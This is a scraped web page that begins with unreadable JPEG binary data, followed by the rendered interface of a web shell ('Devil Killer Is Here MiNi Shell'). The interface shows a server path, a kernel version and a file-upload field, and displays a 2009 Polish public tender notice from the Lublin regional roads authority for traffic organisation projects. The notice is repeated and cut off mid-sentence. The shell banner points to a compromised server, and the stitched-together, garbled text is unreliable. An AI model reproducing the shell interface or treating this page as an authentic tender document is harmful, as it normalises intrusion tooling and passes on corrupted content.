JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/31726-N-2009.html

<p class="kh_header"><b>Lublin: Opracowanie i aktualizacja projektów organizacji ruchu (w wersji elektronicznej) dla następujących odcinków dróg wojewódzkich zarządzanych przez ZDW 
w Lublinie:
ZADANIE I - nr 812 Biała Podl. - Wisznice - Włodawa - Chełm - Rejowiec - Krasnystaw - dł.  143,202 km,
ZADANIE IV - nr 817 rz.Wisła - Kamień - dr. 747  - dł. 5,600 km</b><br>
<b>Numer ogłoszenia: 31726 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i aktualizacja projektów organizacji ruchu (w wersji elektronicznej) dla następujących odcinków dróg wojewódzkich zarządzanych przez ZDW 
w Lublinie:
ZADANIE I - nr 812 Biała Podl. - Wisznice - Włodawa - Chełm - Rejowiec - Krasnystaw - dł.  143,202 km,
ZADANIE IV - nr 817 rz.Wisła - Kamień - dr. 747  - dł. 5,600 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na:
opracowaniu i aktualizacji projektów organizacji ruchu (w wersji elektronicznej) dla następujących odcinków dróg wojewódzkich zarządzanych przez ZDW 
w Lublinie:
ZADANIE I - nr 812 Biała Podl. - Wisznice - Włodawa - Chełm - Rejowiec - Krasnystaw - dł.  143,202 km,
ZADANIE IV - nr 817 rz.Wisła - Kamień - dr. 747  - dł. 5,600 km,

zgodnie z poniższym opisem przedmiotu zamówienia:

A. Materiały wyjściowe.

1.	Wytyczne do opracowania projektów organizacji ruchu na drogach wojewódzkich województwa lubelskiego w 2009 roku. 
2.	Wykaz punktów referencyjnych łącznie z opisami topograficznymi.
3.	Wyniki pomiarów ruchu przeprowadzonych w 2005 roku.
4.	Wykaz wypadków jakie wydarzyły się na w/w drogach z bazy danych ZDW.

B. Zakres opracowania.

1. Uzyskanie i przygotowanie materiałów do projektowania w postaci kopii map sytuacyjno - wysokościowych lub map zasadniczych w skali 1:1000 (jako skali podstawowej) oraz 1:500 (dla skomplikowanych skrzyżowań oraz na odcinkach leżących w granicach administracyjnych miast) bez aktualizacji geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówień zgodnie z Wytycznymi do opracowania projektów organizacji ruchu na drogach wojewódzkich w 2009 roku - pkt.A.1.
2. Opracowanie projektów organizacji ruchu spełniających wymagania zawarte w rozporządzeniu Ministra Infrastruktury z dnia 23 września 2003 roku  w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. Nr 177 z dnia 14 października 2003r., poz. 1729 ) oraz w wyżej wymienionych Wytycznych - pkt .1.
3. Wykonanie projektów organizacji ruchu w odniesieniu do systemu referencyjnego w formie elektronicznej w postaci plików w formatach DWG i DXF otwieranych przez program AUTOCAD 2008 z opisaniem wprowadzanych elementów (znaki pionowe, poziome, urządzenia bezpieczeństwa ruchu, itp.) na oddzielnych płaszczyznach w sposób umożliwiający automatyczne tworzenie baz danych o tych elementach. Każdy z opisanych elementów takich jak znaki drogowe pionowe lub urządzenia bezpieczeństwa ruchu powinny zawierać w rozszerzonym edytorze atrybutów następujące atrybuty: 
-status znaku lub urządzenia bezp. ruchu tj. projektowany, istniejący,
-nazwa rejonu (administratora drogi), np. RDW Lublin,
-data ustawienia (dla znaków proj.) lub inwentaryzacji (dla znaków istniejących),
-kilometraż np. km 3+441,
-symbol znaku lub urządzenia bezp. ruchu, np. A-7.
4. Uzyskanie wymaganych opinii, tzn. Komendanta Wojewódzkiego Policji w Lublinie i organów zarządzających ruchem na drogach krzyżujących się z drogami wojewódzkimi oraz zatwierdzenia projektów organizacji ruchu przez właściwe organy zarządzające ruchem.

C. Ogólne wymagania dotyczące prac.

1.	Wykonawca odpowiedzialny jest za jakość prac oraz zgodność ich wykonania 
z obowiązującymi przepisami prawnymi i technicznymi.
2.	Projekty muszą uwzględniać stan prawny na dzień przekazania dokumentacji Zamawiającemu.
3.	Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów BHP.
4.	Sprzęt i materiały stosowane do wykonania prac powinny spełniać wymagania Polskich Norm oraz instrukcji i wytycznych technicznych.
5.	Wykonawca nie może wykorzystywać jakichkolwiek wyraźnych błędów lub braków w opisie przedmiotu zamówienia na swoją korzyść. W przypadku gdy Wykonawca wykryje błędy, powiadamia Zamawiającego lub w przypadku kiedy Zamawiający wykryje błędy bądź braki w przedmiocie zamówienia, zgłasza Wykonawcy. Wówczas Wykonawca niezwłocznie, na własny koszt, przystępuje do ich usunięcia w terminie określonym przez Zamawiającego.

D. Skład dokumentacji przekazywanej Zamawiającemu.

1. Dwa egzemplarze projektów (nie licząc egzemplarzy wymaganych na etapie uzgodnień i opinii) w formacie A-3, oprawionych w sztywnych okładkach skoroszytowych (również formatu A-3), umożliwiających wielokrotne wykorzystywanie oraz wyjmowanie pojedynczych stron projektów na papierze o gramaturze 160 g/m2 w tym jeden egzemplarz przygotowany jak wyżej, podzielony na poszczególne Rejony Dróg Wojewódzkich w granicach ich działania.
2. Jeden egzemplarz na płycie DVD w formie elektronicznej z zapisem całego zakresu projektów (z opisem techn., rysunkami, zestawieniami w tabelach, itp.), zaopatrzonej w spis określający szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, na którym został zapisany). Wszystkie materiały tekstowe, takie jak opisy techniczne, tabele, należy zapisać w formatach Microsoft Word lub Microsoft Excel.

E. Odbiór prac.
1.	Wykonawca przekazuje Zamawiającemu całość dokumentacji (jej skład jak podano 
w pkt. D  jw.) opracowanych zgodnie z zakresem podanym w pkt. B, w przewidzianym dla zadań terminie, w siedzibie Zamawiającego.
Należność za prace projektowe będzie uregulowana po zatwierdzeniu projektów 
i przekazaniu całości dokumentacji.
Należy przewidzieć czas niezbędny na sprawdzenie projektów oraz ich zatwierdzenie - min. 1 miesiąc (przed upływem terminu wykonania danego zadania). 
W przypadku stwierdzenia błędów lub usterek w projektach będą one odsyłane w celu dokonania poprawy. Czas przewidziany na zatwierdzenie będzie liczył się od momentu ich ponownego złożenia z naniesionymi poprawkami.

2.	Zamawiający dopuszcza możliwość składania ofert częściowych na pojedyncze Zadania.
Wykonawca może złożyć ofertę na wykonanie jednego lub dwóch zadań, wybranych przez siebie spośród Zadań wyszczególnionych w Opisie przedmiotu zamówienia. 
3.	Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy).Wartość zamówienia (za Zadanie I i IV) 171.122,30 zł. netto.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 
Zadanie I - 1.700,00 zł, (słownie złotych: jeden tysiąc siedemset 00/100),
Zadanie IV - 190,00 zł, (słownie złotych: sto dziewięćdziesiąt 00/100).
2.	Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW 
w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4.	W ofercie należy złożyć dokument potwierdzający wniesienie wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W przetargu mogą wziąć udział Wykonawcy, którzy udokumentują przez stosowne dokumenty lub oświadczenia, że spełniają następujące warunki:
1)	 Są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi.
2)	 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień. 
3)	 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
4)	 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5)	 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
art. 24 ustawy Prawo zamówień publicznych.
6)	 Akceptują warunki zawarte w specyfikacji.
2.	Ponadto Wykonawca musi spełniać następujące warunki udziału:
Wykonanie w ciągu ostatnich 3 lat przed wszczęciem postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 usługi odpowiadającej swoim rodzajem usługom stanowiącym przedmiot zamówienia, tj. projektów organizacji ruchu dla dróg wojewódzkich lub krajowych o zakresie nie mniejszym niż: 
-	w przypadku ubiegania się o zadanie I lub zadania I i IV - min. 30 km
-	w przypadku ubiegania się o zadanie IV - min. 2 km

w jednym zamówieniu z podaniem ich przedmiotu, daty wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.

3.	Ocena spełniania warunków, dokonywana będzie w następujący sposób: spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca załączy do oferty następujące oświadczenia lub dokumenty:
1) Oświadczenie o spełnieniu warunków art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych.
2) Dokument uprawniający Wykonawcę do występowania w obrocie prawnym, zgodnie 
z wymaganiami ustawowymi - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3)	Wykaz minimum 1 usługi, zrealizowanej przez Wykonawcę w ostatnich 3 latach przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy w tym okresie wraz 
z załączonymi dokumentami potwierdzającymi, że usługa ta została wykonana należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 08:00, miejsce: Zarząd Dróg Wojewódzkich 
w Lublinie, ul. Turystyczna 7a, w pokoju nr 107.Otwarcie ofert nastąpi w dniu 27/02/2009 o godz.08:30 w pok. 208.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do porozumiewania się z wykonawcami: 
1.W sprawach technicznych - Wydział Inżynierii Ruchu, mgr inż. Tadeusz Bień, 
tel. (081) 749-53-16.
2.W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia 
i zawarciem umowy - Wydział Zamówień Publicznych, mgr inż. Sławomir Szepietowski, 
tel. (081) 749-53-44; 749-53-29.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie i aktualizacja projektów organizacji ruchu (w wersji elektronicznej) dla następujących odcinków dróg wojewódzkich zarządzanych przez ZDW 
w Lublinie:
ZADANIE I - nr 812 Biała Podl. - Wisznice - Włodawa - Chełm - Rejowiec - Krasnystaw - dł.  143,202 km.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Materiały wyjściowe.

1.	Wytyczne do opracowania projektów organizacji ruchu na drogach wojewódzkich województwa lubelskiego w 2009 roku. 
2.	Wykaz punktów referencyjnych łącznie z opisami topograficznymi.
3.	Wyniki pomiarów ruchu przeprowadzonych w 2005 roku.
4.	Wykaz wypadków jakie wydarzyły się na w/w drogach z bazy danych ZDW.

B. Zakres opracowania.

1. Uzyskanie i przygotowanie materiałów do projektowania w postaci kopii map sytuacyjno - wysokościowych lub map zasadniczych w skali 1:1000 (jako skali podstawowej) oraz 1:500 (dla skomplikowanych skrzyżowań oraz na odcinkach leżących w granicach administracyjnych miast) bez aktualizacji geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówień zgodnie z Wytycznymi do opracowania projektów organizacji ruchu na drogach wojewódzkich w 2009 roku - pkt.A.1.
2. Opracowanie projektów organizacji ruchu spełniających wymagania zawarte w rozporządzeniu Ministra Infrastruktury z dnia 23 września 2003 roku  w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. Nr 177 z dnia 14 października 2003r., poz. 1729 ) oraz w wyżej wymienionych Wytycznych - pkt .1.
3. Wykonanie projektów organizacji ruchu w odniesieniu do systemu referencyjnego w formie elektronicznej w postaci plików w formatach DWG i DXF otwieranych przez program AUTOCAD 2008 z opisaniem wprowadzanych elementów (znaki pionowe, poziome, urządzenia bezpieczeństwa ruchu, itp.) na oddzielnych płaszczyznach w sposób umożliwiający automatyczne tworzenie baz danych o tych elementach. Każdy z opisanych elementów takich jak znaki drogowe pionowe lub urządzenia bezpieczeństwa ruchu powinny zawierać w rozszerzonym edytorze atrybutów następujące atrybuty: 
-status znaku lub urządzenia bezp. ruchu tj. projektowany, istniejący,
-	nazwa rejonu (administratora drogi), np. RDW Lublin,
-	data ustawienia (dla znaków proj.) lub inwentaryzacji (dla znaków istniejących),
-	kilometraż np. km 3+441,
-	symbol znaku lub urządzenia bezp. ruchu, np. A-7.
4. Uzyskanie wymaganych opinii, tzn. Komendanta Wojewódzkiego Policji w Lublinie i organów zarządzających ruchem na drogach krzyżujących się z drogami wojewódzkimi oraz zatwierdzenia projektów organizacji ruchu przez właściwe organy zarządzające ruchem.

C. Ogólne wymagania dotyczące prac.

1.	Wykonawca odpowiedzialny jest za jakość prac oraz zgodność ich wykonania 
z obowiązującymi przepisami prawnymi i technicznymi.
2.	Projekty muszą uwzględniać stan prawny na dzień przekazania dokumentacji Zamawiającemu.
3.	Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów BHP.
4.	Sprzęt i materiały stosowane do wykonania prac powinny spełniać wymagania Polskich Norm oraz instrukcji i wytycznych technicznych.
5.	Wykonawca nie może wykorzystywać jakichkolwiek wyraźnych błędów lub braków w opisie przedmiotu zamówienia na swoją korzyść. W przypadku gdy Wykonawca wykryje błędy, powiadamia Zamawiającego lub w przypadku kiedy Zamawiający wykryje błędy bądź braki w przedmiocie zamówienia, zgłasza Wykonawcy. Wówczas Wykonawca niezwłocznie, na własny koszt, przystępuje do ich usunięcia w terminie określonym przez Zamawiającego.

D. Skład dokumentacji przekazywanej Zamawiającemu.

1. Dwa egzemplarze projektów (nie licząc egzemplarzy wymaganych na etapie uzgodnień i opinii) w formacie A-3, oprawionych w sztywnych okładkach skoroszytowych (również formatu A-3), umożliwiających wielokrotne wykorzystywanie oraz wyjmowanie pojedynczych stron projektów na papierze o gramaturze 160 g/m2 w tym jeden egzemplarz przygotowany jak wyżej, podzielony na poszczególne Rejony Dróg Wojewódzkich w granicach ich działania.
2. Jeden egzemplarz na płycie DVD w formie elektronicznej z zapisem całego zakresu projektów (z opisem techn., rysunkami, zestawieniami w tabelach, itp.), zaopatrzonej w spis określający szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, na którym został zapisany). Wszystkie materiały tekstowe, takie jak opisy techniczne, tabele, należy zapisać w formatach Microsoft Word lub Microsoft Excel.

E. Odbiór prac.
1.	Wykonawca przekazuje Zamawiającemu całość dokumentacji (jej skład jak podano 
w pkt. D  jw.) opracowanych zgodnie z zakresem podanym w pkt. B, w przewidzianym dla zadań terminie, w siedzibie Zamawiającego.
Należność za prace projektowe będzie uregulowana po zatwierdzeniu projektów 
i przekazaniu całości dokumentacji.
Należy przewidzieć czas niezbędny na sprawdzenie projektów oraz ich zatwierdzenie - min. 1 miesiąc (przed upływem terminu wykonania danego zadania). 
W przypadku stwierdzenia błędów lub usterek w projektach będą one odsyłane w celu dokonania poprawy. Czas przewidziany na zatwierdzenie będzie liczył się od momentu ich ponownego złożenia z naniesionymi poprawkami.Wartość Zadania I: 164.682,30 zł. netto.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie i aktualizacja projektów organizacji ruchu (w wersji elektronicznej) dla następujących odcinków dróg wojewódzkich zarządzanych przez ZDW 
w Lublinie:
ZADANIE IV - nr 817 rz.Wisła - Kamień - dr. 747  - dł. 5,600 km.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Materiały wyjściowe.

1.	Wytyczne do opracowania projektów organizacji ruchu na drogach wojewódzkich województwa lubelskiego w 2009 roku. 
2.	Wykaz punktów referencyjnych łącznie z opisami topograficznymi.
3.	Wyniki pomiarów ruchu przeprowadzonych w 2005 roku.
4.	Wykaz wypadków jakie wydarzyły się na w/w drogach z bazy danych ZDW.

B. Zakres opracowania.

1. Uzyskanie i przygotowanie materiałów do projektowania w postaci kopii map sytuacyjno - wysokościowych lub map zasadniczych w skali 1:1000 (jako skali podstawowej) oraz 1:500 (dla skomplikowanych skrzyżowań oraz na odcinkach leżących w granicach administracyjnych miast) bez aktualizacji geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówień zgodnie z Wytycznymi do opracowania projektów organizacji ruchu na drogach wojewódzkich w 2009 roku - pkt.A.1.
2. Opracowanie projektów organizacji ruchu spełniających wymagania zawarte w rozporządzeniu Ministra Infrastruktury z dnia 23 września 2003 roku  w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. Nr 177 z dnia 14 października 2003r., poz. 1729 ) oraz w wyżej wymienionych Wytycznych - pkt .1.
3. Wykonanie projektów organizacji ruchu w odniesieniu do systemu referencyjnego w formie elektronicznej w postaci plików w formatach DWG i DXF otwieranych przez program AUTOCAD 2008 z opisaniem wprowadzanych elementów (znaki pionowe, poziome, urządzenia bezpieczeństwa ruchu, itp.) na oddzielnych płaszczyznach w sposób umożliwiający automatyczne tworzenie baz danych o tych elementach. Każdy z opisanych elementów takich jak znaki drogowe pionowe lub urządzenia bezpieczeństwa ruchu powinny zawierać w rozszerzonym edytorze atrybutów następujące atrybuty: 
-	status znaku lub urządzenia bezp. ruchu tj. projektowany, istniejący,
-	nazwa rejonu (administratora drogi), np. RDW Lublin,
-	data ustawienia (dla znaków proj.) lub inwentaryzacji (dla znaków istniejących),
-	kilometraż np. km 3+441,
-	symbol znaku lub urządzenia bezp. ruchu, np. A-7.
4. Uzyskanie wymaganych opinii, tzn. Komendanta Wojewódzkiego Policji w Lublinie i organów zarządzających ruchem na drogach krzyżujących się z drogami wojewódzkimi oraz zatwierdzenia projektów organizacji ruchu przez właściwe organy zarządzające ruchem.

C. Ogólne wymagania dotyczące prac.

1.	Wykonawca odpowiedzialny jest za jakość prac oraz zgodność ich wykonania 
z obowiązującymi przepisami prawnymi i technicznymi.
2.	Projekty muszą uwzględniać stan prawny na dzień przekazania dokumentacji Zamawiającemu.
3.	Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów BHP.
4.	Sprzęt i materiały stosowane do wykonania prac powinny spełniać wymagania Polskich Norm oraz instrukcji i wytycznych technicznych.
5.	Wykonawca nie może wykorzystywać jakichkolwiek wyraźnych błędów lub braków w opisie przedmiotu zamówienia na swoją korzyść. W przypadku gdy Wykonawca wykryje błędy, powiadamia Zamawiającego lub w przypadku kiedy Zamawiający wykryje błędy bądź braki w przedmiocie zamówienia, zgłasza Wykonawcy. Wówczas Wykonawca niezwłocznie, na własny koszt, przystępuje do ich usunięcia w terminie określonym przez Zamawiającego.

D. Skład dokumentacji przekazywanej Zamawiającemu.

1. Dwa egzemplarze projektów (nie licząc egzemplarzy wymaganych na etapie uzgodnień i opinii) w formacie A-3, oprawionych w sztywnych okładkach skoroszytowych (również formatu A-3), umożliwiających wielokrotne wykorzystywanie oraz wyjmowanie pojedynczych stron projektów na papierze o gramaturze 160 g/m2 w tym jeden egzemplarz przygotowany jak wyżej, podzielony na poszczególne Rejony Dróg Wojewódzkich w granicach ich działania.
2. Jeden egzemplarz na płycie DVD w formie elektronicznej z zapisem całego zakresu projektów (z opisem techn., rysunkami, zestawieniami w tabelach, itp.), zaopatrzonej w spis określający szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, na którym został zapisany). Wszystkie materiały tekstowe, takie jak opisy techniczne, tabele, należy zapisać w formatach Microsoft Word lub Microsoft Excel.

E. Odbiór prac.
1.	Wykonawca przekazuje Zamawiającemu całość dokumentacji (jej skład jak podano 
w pkt. D  jw.) opracowanych zgodnie z zakresem podanym w pkt. B, w przewidzianym dla zadań terminie, w siedzibie Zamawiającego.
Należność za prace projektowe będzie uregulowana po zatwierdzeniu projektów 
